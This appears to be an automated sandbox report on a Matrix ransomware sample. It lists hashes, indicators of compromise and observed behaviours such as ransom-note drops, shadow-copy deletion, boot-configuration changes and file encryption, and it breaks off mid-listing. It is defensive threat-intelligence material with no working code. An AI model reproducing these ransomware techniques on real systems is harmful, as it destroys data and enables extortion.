Analysis
-
max time kernel
4294211s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20220223-en -
submitted
06-03-2022 05:30
Static task
static1
Behavioral task
behavioral1
Sample
fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe
Resource
win10v2004-en-20220112
General
-
Target
fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe
-
Size
2.6MB
-
MD5
99f0feb589d41c1465846e380d5cdc7d
-
SHA1
bae92119e9d856e735ed605d2db42680c2dabfc7
-
SHA256
fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107
-
SHA512
d8a35f82f4e9d506db76da2ae6ce64b5cc19e28bf74353a07c750ce07547d43ac626d186f5a2f5572ac71d86f2d37868f5837f4b369b8c514c7497b771d8cfef
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jre7\lib\zi\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Lime\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Users\All Users\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\db\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jre7\lib\images\cursors\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\7-Zip\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Users\Public\Libraries\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Users\All Users\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Users\Public\Recorded TV\Sample Media\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Mozilla Firefox\browser\features\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1704 bcdedit.exe 336 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 1216 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS c05GxIuC64.exe -
Executes dropped EXE 3 IoCs
pid Process 668 NWHoFMNm.exe 864 c05GxIuC.exe 1876 c05GxIuC64.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\ApproveConvertTo.tiff fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe -
Sets service image path in registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00060000000142d2-71.dat upx behavioral1/files/0x00060000000142d2-70.dat upx behavioral1/files/0x00060000000142d2-72.dat upx -
Loads dropped DLL 4 IoCs
pid Process 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 960 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe 1020 cmd.exe 864 c05GxIuC.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1900 takeown.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\H: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\E: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\A: c05GxIuC64.exe File opened (read-only) \??\H: c05GxIuC64.exe File opened (read-only) \??\P: c05GxIuC64.exe File opened (read-only) \??\W: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\J: c05GxIuC64.exe File opened (read-only) \??\R: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\S: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\G: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\E: c05GxIuC64.exe File opened (read-only) \??\I: c05GxIuC64.exe File opened (read-only) \??\M: c05GxIuC64.exe File opened (read-only) \??\R: c05GxIuC64.exe File opened (read-only) \??\S: c05GxIuC64.exe File opened (read-only) \??\V: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\X: c05GxIuC64.exe File opened (read-only) \??\Y: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\N: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\Q: c05GxIuC64.exe File opened (read-only) \??\Y: c05GxIuC64.exe File opened (read-only) \??\Z: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\O: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\M: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\K: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\F: c05GxIuC64.exe File opened (read-only) \??\G: c05GxIuC64.exe File opened (read-only) \??\K: c05GxIuC64.exe File opened (read-only) \??\N: c05GxIuC64.exe File opened (read-only) \??\P: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\I: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\O: c05GxIuC64.exe File opened (read-only) \??\T: c05GxIuC64.exe File opened (read-only) \??\X: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\F: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\U: c05GxIuC64.exe File opened (read-only) \??\W: c05GxIuC64.exe File opened (read-only) \??\Z: c05GxIuC64.exe File opened (read-only) \??\L: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\Q: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\J: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened (read-only) \??\B: c05GxIuC64.exe File opened (read-only) \??\L: c05GxIuC64.exe File opened (read-only) \??\V: c05GxIuC64.exe File opened (read-only) \??\T: fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\7fE2wvr6.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02055_.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0086432.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\STUBBY2.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115875.GIF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE.HXS fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ko.properties fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\DRUMROLL.WAV fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01329_.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPQUOT.XML fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ONINTL.DLL.IDX_DLL fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR16F.GIF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CHIMES.WAV fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Sts.css fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE_COL.HXC fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02073_.GIF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106020.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0304933.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OIS_K_COL.HXK fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02082_.GIF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\UpdateSkip.vssm fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_OFF.GIF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Winnipeg fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\REC.CFG fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\SalesReport.xltx fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\lt.pak fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#FOX_README#.rtf fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099182.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\TAB_OFF.GIF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsHomePageStyle.css fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\Xlate_Complete.xsn fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00078_.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00204_.WMF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7 fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099193.GIF fdf5c750970f62c54c40df974fc775c873c8916097db05f2f3d11012c87cd107.exe File opened for modification C:\Program Files (x86)\Microsoft 